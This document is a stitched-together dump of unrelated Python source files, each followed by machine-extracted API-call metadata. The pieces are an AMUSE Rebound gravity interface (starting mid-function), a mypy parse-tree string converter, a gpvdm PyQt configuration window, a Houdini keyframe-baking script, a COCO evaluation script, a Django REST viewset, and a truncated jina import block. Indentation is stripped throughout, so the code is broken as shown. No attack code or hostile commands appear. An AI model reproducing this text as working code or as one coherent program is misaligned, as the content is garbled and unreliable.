function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('time', dtype='float64', direction=function.OUT,
description = "The current model time")
function.result_type = 'int32'
function.result_doc = """
0 - OK
Current value of the time was retrieved
-1 - ERROR
The code does not have support for querying the time
"""
return function
@legacy_function
def get_time_step():
"""
Retrieve the model timestep.
"""
function = LegacyFunctionSpecification()
function.addParameter('code_index', dtype='int32', direction=function.IN, description = "Index of the code in rebound", default = 0)
function.addParameter('time_step', dtype='float64', direction=function.OUT,
description = "The current model timestep")
function.result_type = 'int32'
function.result_doc = """
0 - OK
Current value of the time step was retrieved
-1 - ERROR
The code does not have support for querying the time
"""
return function
@legacy_function
def new_subset():
"""
        Create a new particle subset (and corresponding code). This subset will evolve separately from others.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = True
function.addParameter('index_of_the_subset', dtype='int32', direction=function.OUT, description =
"""
An index assigned to the newly created subset
"""
)
function.addParameter('time_offset', dtype='float64', direction=function.IN, description = "Time of the system (defaults to the current model time)", default = -1)
function.result_type = 'int32'
function.result_doc = """ 0 - OK
code was created
-1 - ERROR
code could not be created"""
return function
@legacy_function
def get_state():
"""
Retrieve the current state of a particle. The *minimal* information of a stellar
dynamics particle (mass, radius, position and velocity) is returned.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = True
function.addParameter('index_of_the_particle', dtype='int32', direction=function.IN,
description = "Index of the particle to get the state from. This index must have been returned by an earlier call to :meth:`new_particle`")
function.addParameter('mass', dtype='float64', direction=function.OUT, description = "The current mass of the particle")
function.addParameter('x', dtype='float64', direction=function.OUT, description = "The current position vector of the particle")
function.addParameter('y', dtype='float64', direction=function.OUT, description = "The current position vector of the particle")
function.addParameter('z', dtype='float64', direction=function.OUT, description = "The current position vector of the particle")
function.addParameter('vx', dtype='float64', direction=function.OUT, description = "The current velocity vector of the particle")
function.addParameter('vy', dtype='float64', direction=function.OUT, description = "The current velocity vector of the particle")
function.addParameter('vz', dtype='float64', direction=function.OUT, description = "The current velocity vector of the particle")
function.addParameter('radius', dtype='float64', direction=function.OUT, description = "The current radius of the particle")
function.addParameter('subset', dtype='int32', direction=function.OUT, description = "The current subset of the particle")
function.result_type = 'int32'
function.result_doc = """
0 - OK
            particle was found in the model and the information was retrieved
-1 - ERROR
particle could not be found
"""
return function
@legacy_function
def get_subset():
"""
Retrieve the subset index of a particle.
"""
function = LegacyFunctionSpecification()
function.addParameter('index_of_the_particle', dtype='int32', direction=function.IN,
description = "Index of the particle to get the subset of. This index must have been returned by an earlier call to :meth:`new_particle`")
function.addParameter('subset', dtype='int32', direction=function.OUT, description = "The current subset of the particle")
function.result_type = 'int32'
function.can_handle_array = True
function.result_doc = """
0 - OK
            particle was found in the model and the information was retrieved
-1 - ERROR
particle could not be found
"""
return function
@legacy_function
def stop_subset():
"""
Stop a subset code
"""
function = LegacyFunctionSpecification()
function.can_handle_array = True
function.addParameter('index_of_the_subset', dtype='int32', direction=function.IN, description =
"""
An index assigned to an existing subset
"""
)
function.result_type = 'int32'
function.result_doc = """ 0 - OK
subset evolving was stopped
-1 - ERROR
subset evolving was already stopped"""
return function
@legacy_function
def set_subset():
"""
        Set the subset index of a particle.
"""
function = LegacyFunctionSpecification()
function.addParameter('index_of_the_particle', dtype='int32', direction=function.IN,
description = "Index of the particle to get the subset of. This index must have been returned by an earlier call to :meth:`new_particle`")
function.addParameter('subset', dtype='int32', direction=function.IN, description = "The new subset of the particle, as this is actually read only this will fail if changed!")
function.result_type = 'int32'
function.can_handle_array = True
function.result_doc = """
0 - OK
            particle was found in the model and the information was retrieved
-1 - ERROR
particle could not be found
"""
return function
class Rebound(GravitationalDynamics, GravityFieldCode):
__interface__ = ReboundInterface
def __init__(self, convert_nbody = None, **options):
self.stopping_conditions = StoppingConditions(self)
legacy_interface = self.__interface__(**options)
self.legacy_doc = legacy_interface.__doc__
GravitationalDynamics.__init__(
self,
legacy_interface,
convert_nbody,
**options
)
def define_state(self, handler):
GravitationalDynamics.define_state(self, handler)
#GravityFieldCode.define_state(self, handler)
self.stopping_conditions.define_state(handler)
handler.add_method('EDIT', 'new_subset')
handler.add_method('RUN', 'new_subset')
def define_parameters(self, handler):
self.stopping_conditions.define_parameters(handler)
GravitationalDynamics.define_parameters(self, handler)
handler.add_method_parameter(
"get_time_step",
"set_time_step",
"timestep",
"constant timestep for iteration",
default_value = 0.0001 | nbody_system.time
)
handler.add_method_parameter(
"get_integrator",
"set_integrator",
"integrator",
"name of the integrator to use ({0})".format(sorted(self.INTEGRATORS.keys())),
default_value = "ias15"
)
handler.add_method_parameter(
"get_solver",
"set_solver",
"solver",
"name of the gravity solver to use ({0})".format(sorted(self.SOLVERS.keys())),
default_value = "compensated"
)
handler.add_method_parameter(
"get_eps2",
"set_eps2",
"epsilon_squared",
"smoothing parameter for gravity calculations",
default_value = 0.0 | nbody_system.length * nbody_system.length
)
handler.add_method_parameter(
"get_opening_angle2",
"set_opening_angle2",
"opening_angle2",
"opening angle, theta, for building the tree in case of tree solver: between 0 and 1",
default_value = 0.5
)
handler.add_method_parameter(
"get_boundary",
"set_boundary",
"boundary",
"name of the boundary type to use ({0}) (required for tree solver)".format(sorted(self.BOUNDARIES.keys())),
default_value = "none"
)
handler.add_method_parameter(
"get_boundary_size",
"set_boundary_size",
"boundary_size",
"size of the boundaries, if the type is not none",
default_value = 1.0 | nbody_system.length
)
def define_methods(self, handler):
GravitationalDynamics.define_methods(self, handler)
handler.add_method(
"new_particle",
(
nbody_system.mass,
nbody_system.length,
nbody_system.length,
nbody_system.length,
nbody_system.speed,
nbody_system.speed,
nbody_system.speed,
nbody_system.length,
handler.NO_UNIT,
),
(
handler.INDEX,
handler.ERROR_CODE,
)
)
handler.add_method(
"get_potential_energy",
(handler.INDEX,),
(nbody_system.mass * nbody_system.length ** 2 * nbody_system.time ** -2, handler.ERROR_CODE,)
)
handler.add_method(
"get_kinetic_energy",
(handler.INDEX,),
(nbody_system.mass * nbody_system.length ** 2 * nbody_system.time ** -2, handler.ERROR_CODE,)
)
handler.add_method(
'evolve_model',
(
nbody_system.time,
handler.INDEX
),
(
handler.ERROR_CODE,
)
)
handler.add_method(
'get_time',
(handler.INDEX,),
(nbody_system.time, handler.ERROR_CODE,)
)
handler.add_method(
"get_time_step",
(handler.INDEX,),
(nbody_system.time, handler.ERROR_CODE,)
)
handler.add_method(
"set_time_step",
(nbody_system.time, handler.INDEX,),
(handler.ERROR_CODE,)
)
handler.add_method(
"get_state",
(
handler.NO_UNIT,
),
(
nbody_system.mass,
nbody_system.length,
nbody_system.length,
nbody_system.length,
nbody_system.speed,
nbody_system.speed,
nbody_system.speed,
nbody_system.length,
handler.NO_UNIT,
handler.ERROR_CODE
)
)
handler.add_method(
"get_subset",
(
handler.NO_UNIT,
),
(
handler.NO_UNIT,
handler.ERROR_CODE
)
)
handler.add_method(
"set_subset",
(
handler.NO_UNIT,
handler.NO_UNIT,
),
(
handler.ERROR_CODE,
)
)
handler.add_method(
'new_subset',
(
nbody_system.time,
),
(
handler.INDEX,
handler.ERROR_CODE,
)
)
self.stopping_conditions.define_methods(handler)
def define_particle_sets(self, handler):
GravitationalDynamics.define_particle_sets(self, handler)
self.stopping_conditions.define_particle_set(handler)
handler.add_getter('particles', 'get_subset')
handler.add_setter('particles', 'set_subset')
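# Usage sketch (assumption): the class follows the generic AMUSE
# gravitational-dynamics workflow, so a typical session would look roughly like
# the lines below; 'bodies' is a hypothetical nbody particle set.
#
#   from amuse.units import nbody_system
#   gravity = Rebound()
#   gravity.parameters.integrator = "whfast"
#   gravity.particles.add_particles(bodies)
#   gravity.evolve_model(1.0 | nbody_system.time)
#   gravity.stop()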
| [
"amuse.community.interface.gd.GravitationalDynamics.define_particle_sets",
"amuse.community.interface.gd.GravitationalDynamics.define_parameters",
"amuse.community.interface.gd.GravitationalDynamics.__init__",
"amuse.community.interface.gd.GravitationalDynamics.define_state",
"amuse.community.interface.gd.G... | [((22422, 22507), 'amuse.community.interface.gd.GravitationalDynamics.__init__', 'GravitationalDynamics.__init__', (['self', 'legacy_interface', 'convert_nbody'], {}), '(self, legacy_interface, convert_nbody, **options\n )\n', (22452, 22507), False, 'from amuse.community.interface.gd import GravitationalDynamics\n'), ((22612, 22661), 'amuse.community.interface.gd.GravitationalDynamics.define_state', 'GravitationalDynamics.define_state', (['self', 'handler'], {}), '(self, handler)\n', (22646, 22661), False, 'from amuse.community.interface.gd import GravitationalDynamics\n'), ((22998, 23052), 'amuse.community.interface.gd.GravitationalDynamics.define_parameters', 'GravitationalDynamics.define_parameters', (['self', 'handler'], {}), '(self, handler)\n', (23037, 23052), False, 'from amuse.community.interface.gd import GravitationalDynamics\n'), ((24960, 25011), 'amuse.community.interface.gd.GravitationalDynamics.define_methods', 'GravitationalDynamics.define_methods', (['self', 'handler'], {}), '(self, handler)\n', (24996, 25011), False, 'from amuse.community.interface.gd import GravitationalDynamics\n'), ((28025, 28082), 'amuse.community.interface.gd.GravitationalDynamics.define_particle_sets', 'GravitationalDynamics.define_particle_sets', (['self', 'handler'], {}), '(self, handler)\n', (28067, 28082), False, 'from amuse.community.interface.gd import GravitationalDynamics\n')] |
"""Conversion of parse tree nodes to strings."""
import re
import os
import typing
from mypy.util import dump_tagged, short_type
import mypy.nodes
from mypy.visitor import NodeVisitor
class StrConv(NodeVisitor[str]):
"""Visitor for converting a Node to a human-readable string.
For example, an MypyFile node from program '1' is converted into
something like this:
MypyFile:1(
fnam
ExpressionStmt:1(
IntExpr(1)))
"""
def dump(self, nodes, obj):
"""Convert a list of items to a multiline pretty-printed string.
The tag is produced from the type name of obj and its line
number. See mypy.util.dump_tagged for a description of the nodes
argument.
"""
return dump_tagged(nodes, short_type(obj) + ':' + str(obj.line))
def func_helper(self, o):
"""Return a list in a format suitable for dump() that represents the
arguments and the body of a function. The caller can then decorate the
array with information specific to methods, global functions or
anonymous functions.
"""
args = []
init = []
extra = []
for i, kind in enumerate(o.arg_kinds):
if kind == mypy.nodes.ARG_POS:
args.append(o.args[i])
elif kind in (mypy.nodes.ARG_OPT, mypy.nodes.ARG_NAMED):
args.append(o.args[i])
init.append(o.init[i])
elif kind == mypy.nodes.ARG_STAR:
extra.append(('VarArg', [o.args[i]]))
elif kind == mypy.nodes.ARG_STAR2:
extra.append(('DictVarArg', [o.args[i]]))
a = []
if args:
a.append(('Args', args))
if o.type:
a.append(o.type)
if init:
a.append(('Init', init))
if o.is_generator:
a.append('Generator')
a.extend(extra)
a.append(o.body)
return a
# Top-level structures
def visit_mypy_file(self, o):
# Skip implicit definitions.
defs = o.defs
while (defs and isinstance(defs[0], mypy.nodes.VarDef) and
not defs[0].repr):
defs = defs[1:]
a = [defs]
if o.is_bom:
a.insert(0, 'BOM')
# Omit path to special file with name "main". This is used to simplify
# test case descriptions; the file "main" is used by default in many
# test cases.
if o.path is not None and o.path != 'main':
# Insert path. Normalize directory separators to / to unify test
            # case output on all platforms.
a.insert(0, o.path.replace(os.sep, '/'))
return self.dump(a, o)
def visit_import(self, o):
a = []
for id, as_id in o.ids:
a.append('{} : {}'.format(id, as_id))
return 'Import:{}({})'.format(o.line, ', '.join(a))
def visit_import_from(self, o):
a = []
for name, as_name in o.names:
a.append('{} : {}'.format(name, as_name))
return 'ImportFrom:{}({}, [{}])'.format(o.line, o.id, ', '.join(a))
def visit_import_all(self, o):
return 'ImportAll:{}({})'.format(o.line, o.id)
# Definitions
def visit_func_def(self, o):
a = self.func_helper(o)
a.insert(0, o.name())
if mypy.nodes.ARG_NAMED in o.arg_kinds:
a.insert(1, 'MaxPos({})'.format(o.max_pos))
if o.is_abstract:
a.insert(-1, 'Abstract')
if o.is_static:
a.insert(-1, 'Static')
if o.is_property:
a.insert(-1, 'Property')
return self.dump(a, o)
def visit_overloaded_func_def(self, o):
a = o.items[:]
if o.type:
a.insert(0, o.type)
return self.dump(a, o)
def visit_type_def(self, o):
a = [o.name, o.defs.body]
# Display base types unless they are implicitly just builtins.object
# (in this case there is no representation).
if len(o.base_types) > 1 or (len(o.base_types) == 1
and o.base_types[0].repr):
a.insert(1, ('BaseType', o.base_types))
if o.type_vars:
a.insert(1, ('TypeVars', o.type_vars))
if o.metaclass:
a.insert(1, 'Metaclass({})'.format(o.metaclass))
return self.dump(a, o)
def visit_var_def(self, o):
a = []
for n in o.items:
a.append('Var({})'.format(n.name()))
a.append('Type({})'.format(n.type))
if o.init:
a.append(o.init)
return self.dump(a, o)
def visit_var(self, o):
l = ''
# Add :nil line number tag if no line number is specified to remain
# compatible with old test case descriptions that assume this.
if o.line < 0:
l = ':nil'
return 'Var' + l + '(' + o.name() + ')'
def visit_global_decl(self, o):
return self.dump([o.names], o)
def visit_decorator(self, o):
return self.dump([o.var, o.decorators, o.func], o)
def visit_annotation(self, o):
return 'Type:{}({})'.format(o.line, o.type)
# Statements
def visit_block(self, o):
return self.dump(o.body, o)
def visit_expression_stmt(self, o):
return self.dump([o.expr], o)
def visit_assignment_stmt(self, o):
if len(o.lvalues) > 1:
a = [('Lvalues', o.lvalues)]
else:
a = [o.lvalues[0]]
a.append(o.rvalue)
if o.type:
a.append(o.type)
return self.dump(a, o)
def visit_operator_assignment_stmt(self, o):
return self.dump([o.op, o.lvalue, o.rvalue], o)
def visit_while_stmt(self, o):
a = [o.expr, o.body]
if o.else_body:
a.append(('Else', o.else_body.body))
return self.dump(a, o)
def visit_for_stmt(self, o):
a = [o.index]
if o.types != [None] * len(o.types):
a += o.types
a.extend([o.expr, o.body])
if o.else_body:
a.append(('Else', o.else_body.body))
return self.dump(a, o)
def visit_return_stmt(self, o):
return self.dump([o.expr], o)
def visit_if_stmt(self, o):
a = []
for i in range(len(o.expr)):
a.append(('If', [o.expr[i]]))
a.append(('Then', o.body[i].body))
if not o.else_body:
return self.dump(a, o)
else:
return self.dump([a, ('Else', o.else_body.body)], o)
def visit_break_stmt(self, o):
return self.dump([], o)
def visit_continue_stmt(self, o):
return self.dump([], o)
def visit_pass_stmt(self, o):
return self.dump([], o)
def visit_raise_stmt(self, o):
return self.dump([o.expr, o.from_expr], o)
def visit_assert_stmt(self, o):
return self.dump([o.expr], o)
def visit_yield_stmt(self, o):
return self.dump([o.expr], o)
def visit_del_stmt(self, o):
return self.dump([o.expr], o)
def visit_try_stmt(self, o):
a = [o.body]
for i in range(len(o.vars)):
a.append(o.types[i])
if o.vars[i]:
a.append(o.vars[i])
a.append(o.handlers[i])
if o.else_body:
a.append(('Else', o.else_body.body))
if o.finally_body:
a.append(('Finally', o.finally_body.body))
return self.dump(a, o)
def visit_with_stmt(self, o):
a = []
for i in range(len(o.expr)):
a.append(('Expr', [o.expr[i]]))
if o.name[i]:
a.append(('Name', [o.name[i]]))
return self.dump(a + [o.body], o)
def visit_print_stmt(self, o):
a = o.args[:]
if o.newline:
a.append('Newline')
return self.dump(a, o)
# Expressions
# Simple expressions
def visit_int_expr(self, o):
return 'IntExpr({})'.format(o.value)
def visit_str_expr(self, o):
return 'StrExpr({})'.format(self.str_repr(o.value))
def visit_bytes_expr(self, o):
return 'BytesExpr({})'.format(self.str_repr(o.value))
def visit_unicode_expr(self, o):
return 'UnicodeExpr({})'.format(self.str_repr(o.value))
def str_repr(self, s):
s = re.sub(r'\\u[0-9a-fA-F]{4}', lambda m: '\\' + m.group(0), s)
return re.sub('[^\\x20-\\x7e]',
lambda m: r'\u%.4x' % ord(m.group(0)), s)
def visit_float_expr(self, o):
return 'FloatExpr({})'.format(o.value)
def visit_paren_expr(self, o):
return self.dump([o.expr], o)
def visit_name_expr(self, o):
return (short_type(o) + '(' + self.pretty_name(o.name, o.kind,
o.fullname, o.is_def)
+ ')')
def pretty_name(self, name, kind, fullname, is_def):
n = name
if is_def:
n += '*'
if kind == mypy.nodes.GDEF or (fullname != name and
fullname is not None):
# Append fully qualified name for global references.
n += ' [{}]'.format(fullname)
elif kind == mypy.nodes.LDEF:
# Add tag to signify a local reference.
n += ' [l]'
elif kind == mypy.nodes.MDEF:
# Add tag to signify a member reference.
n += ' [m]'
return n
def visit_member_expr(self, o):
return self.dump([o.expr, self.pretty_name(o.name, o.kind, o.fullname,
o.is_def)], o)
def visit_call_expr(self, o):
if o.analyzed:
return o.analyzed.accept(self)
args = []
extra = []
for i, kind in enumerate(o.arg_kinds):
if kind in [mypy.nodes.ARG_POS, mypy.nodes.ARG_STAR]:
args.append(o.args[i])
if kind == mypy.nodes.ARG_STAR:
extra.append('VarArg')
elif kind == mypy.nodes.ARG_NAMED:
extra.append(('KwArgs', [o.arg_names[i], o.args[i]]))
elif kind == mypy.nodes.ARG_STAR2:
extra.append(('DictVarArg', [o.args[i]]))
else:
raise RuntimeError('unknown kind %d' % kind)
return self.dump([o.callee, ('Args', args)] + extra, o)
def visit_op_expr(self, o):
return self.dump([o.op, o.left, o.right], o)
def visit_cast_expr(self, o):
return self.dump([o.expr, o.type], o)
def visit_unary_expr(self, o):
return self.dump([o.op, o.expr], o)
def visit_list_expr(self, o):
return self.dump(o.items, o)
def visit_dict_expr(self, o):
return self.dump([[k, v] for k, v in o.items], o)
def visit_set_expr(self, o):
return self.dump(o.items, o)
def visit_tuple_expr(self, o):
return self.dump(o.items, o)
def visit_index_expr(self, o):
if o.analyzed:
return o.analyzed.accept(self)
return self.dump([o.base, o.index], o)
def visit_super_expr(self, o):
return self.dump([o.name], o)
def visit_undefined_expr(self, o):
return 'UndefinedExpr:{}({})'.format(o.line, o.type)
def visit_type_application(self, o):
return self.dump([o.expr, ('Types', o.types)], o)
def visit_type_var_expr(self, o):
if o.values:
return self.dump([('Values', o.values)], o)
else:
return 'TypeVarExpr:{}()'.format(o.line)
def visit_func_expr(self, o):
a = self.func_helper(o)
return self.dump(a, o)
def visit_generator_expr(self, o):
# FIX types
return self.dump([o.left_expr, o.index, o.right_expr, o.condition], o)
def visit_list_comprehension(self, o):
return self.dump([o.generator], o)
def visit_conditional_expr(self, o):
return self.dump([('Condition', [o.cond]), o.if_expr, o.else_expr], o)
def visit_slice_expr(self, o):
a = [o.begin_index, o.end_index, o.stride]
if not a[0]:
a[0] = '<empty>'
if not a[1]:
a[1] = '<empty>'
return self.dump(a, o)
def visit_coerce_expr(self, o):
return self.dump([o.expr, ('Types', [o.target_type, o.source_type])],
o)
def visit_type_expr(self, o):
return self.dump([str(o.type)], o)
def visit_filter_node(self, o):
# These are for convenience. These node types are not defined in the
# parser module.
pass
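# Usage sketch (assumption): like other NodeVisitor subclasses, StrConv is
# driven through a parsed node's accept() method, e.g.
#
#   dumped = some_mypy_node.accept(StrConv())   # 'some_mypy_node' is hypothetical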
| [
"mypy.util.short_type"
] | [((789, 804), 'mypy.util.short_type', 'short_type', (['obj'], {}), '(obj)\n', (799, 804), False, 'from mypy.util import dump_tagged, short_type\n'), ((8895, 8908), 'mypy.util.short_type', 'short_type', (['o'], {}), '(o)\n', (8905, 8908), False, 'from mypy.util import dump_tagged, short_type\n')] |
#
# General-purpose Photovoltaic Device Model - a drift diffusion base/Shockley-Read-Hall
# model for 1st, 2nd and 3rd generation solar cells.
# Copyright (C) 2008-2022 <NAME> r.<EMAIL>.<EMAIL> at googlemail.com
#
# https://www.gpvdm.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License v2.0, as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
## @package config_window
# Configuration window.
#
import os
from icon_lib import icon_get
#qt
from PyQt5.QtCore import QSize, Qt
from PyQt5.QtWidgets import QWidget,QVBoxLayout,QToolBar,QSizePolicy,QAction,QTabWidget
from PyQt5.QtGui import QPainter,QIcon
#python modules
import webbrowser
#windows
from tab import tab_class
from PyQt5.QtCore import pyqtSignal
from global_objects import global_object_run
from inp import inp
from cal_path import get_sim_path
from QWidgetSavePos import QWidgetSavePos
from css import css_apply
from gpvdm_json import gpvdm_data
class class_config_window(QWidgetSavePos):
changed = pyqtSignal()
def callback_tab_changed(self):
self.changed.emit()
global_object_run("ribbon_configure_dump_refresh")
def __init__(self,files,description,title=_("Configure"),icon="preferences-system",data=gpvdm_data()):
QWidgetSavePos.__init__(self,"config_window")
self.data=data
self.toolbar=QToolBar()
self.toolbar.setToolButtonStyle( Qt.ToolButtonTextUnderIcon)
self.toolbar.setIconSize(QSize(48, 48))
self.setFixedSize(900, 600)
self.setWindowIcon(icon_get(icon))
self.setWindowTitle(title+" (https://www.gpvdm.com)")
self.main_vbox = QVBoxLayout()
spacer = QWidget()
spacer.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.toolbar.addWidget(spacer)
self.undo = QAction(icon_get("help"), _("Help"), self)
self.undo.setStatusTip(_("Help"))
self.undo.triggered.connect(self.callback_help)
self.toolbar.addAction(self.undo)
self.main_vbox.addWidget(self.toolbar)
self.notebook = QTabWidget()
css_apply(self.notebook,"tab_default.css")
self.notebook.setMovable(True)
self.main_vbox.addWidget(self.notebook)
if (len(files)>0):
for i in range(0,len(files)):
file_name=files[i]
tab=tab_class(file_name,data=self.data)
self.notebook.addTab(tab,description[i])
self.setLayout(self.main_vbox)
def callback_help(self):
webbrowser.open('http://www.gpvdm.com/man/index.html')
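# Usage sketch (assumption): the window is normally built from parallel lists of
# gpvdm input files and tab labels; the file name below is a placeholder, not a
# real gpvdm input file.
#
#   w = class_config_window(["solver.inp"], [_("Solver")], title=_("Configure solver"))
#   w.show()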
| [
"PyQt5.QtWidgets.QWidget",
"PyQt5.QtCore.pyqtSignal",
"PyQt5.QtWidgets.QToolBar",
"global_objects.global_object_run",
"webbrowser.open",
"tab.tab_class",
"icon_lib.icon_get",
"QWidgetSavePos.QWidgetSavePos.__init__",
"css.css_apply",
"gpvdm_json.gpvdm_data",
"PyQt5.QtWidgets.QTabWidget",
"PyQt... | [((1551, 1563), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', ([], {}), '()\n', (1561, 1563), False, 'from PyQt5.QtCore import pyqtSignal\n'), ((1622, 1672), 'global_objects.global_object_run', 'global_object_run', (['"""ribbon_configure_dump_refresh"""'], {}), "('ribbon_configure_dump_refresh')\n", (1639, 1672), False, 'from global_objects import global_object_run\n'), ((1763, 1775), 'gpvdm_json.gpvdm_data', 'gpvdm_data', ([], {}), '()\n', (1773, 1775), False, 'from gpvdm_json import gpvdm_data\n'), ((1780, 1826), 'QWidgetSavePos.QWidgetSavePos.__init__', 'QWidgetSavePos.__init__', (['self', '"""config_window"""'], {}), "(self, 'config_window')\n", (1803, 1826), False, 'from QWidgetSavePos import QWidgetSavePos\n'), ((1858, 1868), 'PyQt5.QtWidgets.QToolBar', 'QToolBar', ([], {}), '()\n', (1866, 1868), False, 'from PyQt5.QtWidgets import QWidget, QVBoxLayout, QToolBar, QSizePolicy, QAction, QTabWidget\n'), ((2119, 2132), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (2130, 2132), False, 'from PyQt5.QtWidgets import QWidget, QVBoxLayout, QToolBar, QSizePolicy, QAction, QTabWidget\n'), ((2145, 2154), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2152, 2154), False, 'from PyQt5.QtWidgets import QWidget, QVBoxLayout, QToolBar, QSizePolicy, QAction, QTabWidget\n'), ((2500, 2512), 'PyQt5.QtWidgets.QTabWidget', 'QTabWidget', ([], {}), '()\n', (2510, 2512), False, 'from PyQt5.QtWidgets import QWidget, QVBoxLayout, QToolBar, QSizePolicy, QAction, QTabWidget\n'), ((2515, 2558), 'css.css_apply', 'css_apply', (['self.notebook', '"""tab_default.css"""'], {}), "(self.notebook, 'tab_default.css')\n", (2524, 2558), False, 'from css import css_apply\n'), ((2864, 2918), 'webbrowser.open', 'webbrowser.open', (['"""http://www.gpvdm.com/man/index.html"""'], {}), "('http://www.gpvdm.com/man/index.html')\n", (2879, 2918), False, 'import webbrowser\n'), ((1959, 1972), 'PyQt5.QtCore.QSize', 'QSize', (['(48)', '(48)'], {}), '(48, 48)\n', (1964, 1972), False, 'from PyQt5.QtCore import QSize, Qt\n'), ((2026, 2040), 'icon_lib.icon_get', 'icon_get', (['icon'], {}), '(icon)\n', (2034, 2040), False, 'from icon_lib import icon_get\n'), ((2280, 2296), 'icon_lib.icon_get', 'icon_get', (['"""help"""'], {}), "('help')\n", (2288, 2296), False, 'from icon_lib import icon_get\n'), ((2720, 2756), 'tab.tab_class', 'tab_class', (['file_name'], {'data': 'self.data'}), '(file_name, data=self.data)\n', (2729, 2756), False, 'from tab import tab_class\n')] |
"""
bakes Houdini channel expressions into
keys on each frame in the timeline
Houdini 15.0
todo:
- automatic parm selection
"""
__version__ = 'v0.3'
__author__ = 'github/danielforgacs'
import hou
def bake_parm(parm):
values = []
start, end = get_frame_range()
end += 1
values = get_values(start, end, parm)
parm.deleteAllKeyframes()
bake_values(start, end, parm, values)
def get_values(start, end, parm):
vals = []
for frame in range( start, end):
vals.append(parm.evalAtFrame(frame))
return vals
def bake_values(start, end, parm, values):
for frame in range( start, end):
keyframe = hou.Keyframe()
keyframe.setValue(values[frame - start])
keyframe.setFrame(frame)
keyframe.setExpression('spline()')
parm.setKeyframe(keyframe)
def get_frame_range():
get = hou.expandString
start, end = (int(get('$FSTART')), int(get('$FEND')))
return (start, end)
def main():
parm = hou.parm('/obj/geo1/rx')
bake_parm(parm)
| [
"hou.parm",
"hou.Keyframe"
] | [((1073, 1097), 'hou.parm', 'hou.parm', (['"""/obj/geo1/rx"""'], {}), "('/obj/geo1/rx')\n", (1081, 1097), False, 'import hou\n'), ((712, 726), 'hou.Keyframe', 'hou.Keyframe', ([], {}), '()\n', (724, 726), False, 'import hou\n')] |
"""
Runs the coco-supplied cocoeval script to evaluate detections
outputted by using the output_coco_json flag in eval.py.
"""
import argparse
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
parser = argparse.ArgumentParser(description='COCO Detections Evaluator')
parser.add_argument('--bbox_det_file', default='results/bbox_detections.json', type=str)
parser.add_argument('--mask_det_file', default='results/mask_detections.json', type=str)
parser.add_argument('--gt_ann_file', default='data/scripts/coco/annotations/instances_val2017.json', type=str)
parser.add_argument('--eval_type', default='both', choices=['bbox', 'mask', 'both'], type=str)
args = parser.parse_args()
if __name__ == '__main__':
eval_bbox = (args.eval_type in ('bbox', 'both'))
eval_mask = (args.eval_type in ('mask', 'both'))
print('Loading annotations...')
gt_annotations = COCO(args.gt_ann_file)
if eval_bbox:
bbox_dets = gt_annotations.loadRes(args.bbox_det_file)
if eval_mask:
mask_dets = gt_annotations.loadRes(args.mask_det_file)
if eval_bbox:
print('\nEvaluating BBoxes:')
bbox_eval = COCOeval(gt_annotations, bbox_dets, 'bbox')
bbox_eval.evaluate()
bbox_eval.accumulate()
bbox_eval.summarize()
if eval_mask:
print('\nEvaluating Masks:')
bbox_eval = COCOeval(gt_annotations, mask_dets, 'segm')
bbox_eval.evaluate()
bbox_eval.accumulate()
bbox_eval.summarize()
| [
"pycocotools.coco.COCO",
"pycocotools.cocoeval.COCOeval",
"argparse.ArgumentParser"
] | [((233, 297), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""COCO Detections Evaluator"""'}), "(description='COCO Detections Evaluator')\n", (256, 297), False, 'import argparse\n'), ((898, 920), 'pycocotools.coco.COCO', 'COCO', (['args.gt_ann_file'], {}), '(args.gt_ann_file)\n', (902, 920), False, 'from pycocotools.coco import COCO\n'), ((1127, 1170), 'pycocotools.cocoeval.COCOeval', 'COCOeval', (['gt_annotations', 'bbox_dets', '"""bbox"""'], {}), "(gt_annotations, bbox_dets, 'bbox')\n", (1135, 1170), False, 'from pycocotools.cocoeval import COCOeval\n'), ((1305, 1348), 'pycocotools.cocoeval.COCOeval', 'COCOeval', (['gt_annotations', 'mask_dets', '"""segm"""'], {}), "(gt_annotations, mask_dets, 'segm')\n", (1313, 1348), False, 'from pycocotools.cocoeval import COCOeval\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from rest_framework.viewsets import GenericViewSet
from rest_framework import mixins
from irekua_database import models
from irekua_rest_api import serializers
from irekua_rest_api import utils
from irekua_rest_api.permissions import IsAdmin
from irekua_rest_api.permissions import IsDeveloper
from irekua_rest_api.permissions import ReadOnly
class TermViewSet(mixins.UpdateModelMixin,
mixins.RetrieveModelMixin,
mixins.DestroyModelMixin,
utils.CustomViewSetMixin,
GenericViewSet):
queryset = models.Term.objects.all() # pylint: disable=E1101
serializer_mapping = utils.SerializerMapping.from_module(
serializers.terms.terms)
permission_mapping = utils.PermissionMapping(
default=IsDeveloper | IsAdmin | ReadOnly)
| [
"irekua_database.models.Term.objects.all",
"irekua_rest_api.utils.SerializerMapping.from_module",
"irekua_rest_api.utils.PermissionMapping"
] | [((638, 663), 'irekua_database.models.Term.objects.all', 'models.Term.objects.all', ([], {}), '()\n', (661, 663), False, 'from irekua_database import models\n'), ((715, 775), 'irekua_rest_api.utils.SerializerMapping.from_module', 'utils.SerializerMapping.from_module', (['serializers.terms.terms'], {}), '(serializers.terms.terms)\n', (750, 775), False, 'from irekua_rest_api import utils\n'), ((811, 876), 'irekua_rest_api.utils.PermissionMapping', 'utils.PermissionMapping', ([], {'default': '(IsDeveloper | IsAdmin | ReadOnly)'}), '(default=IsDeveloper | IsAdmin | ReadOnly)\n', (834, 876), False, 'from irekua_rest_api import utils\n')] |
from typing import Dict
from jina import Document, DocumentArray, Flow
from docarray.document.generators import from_csv
from random import randint
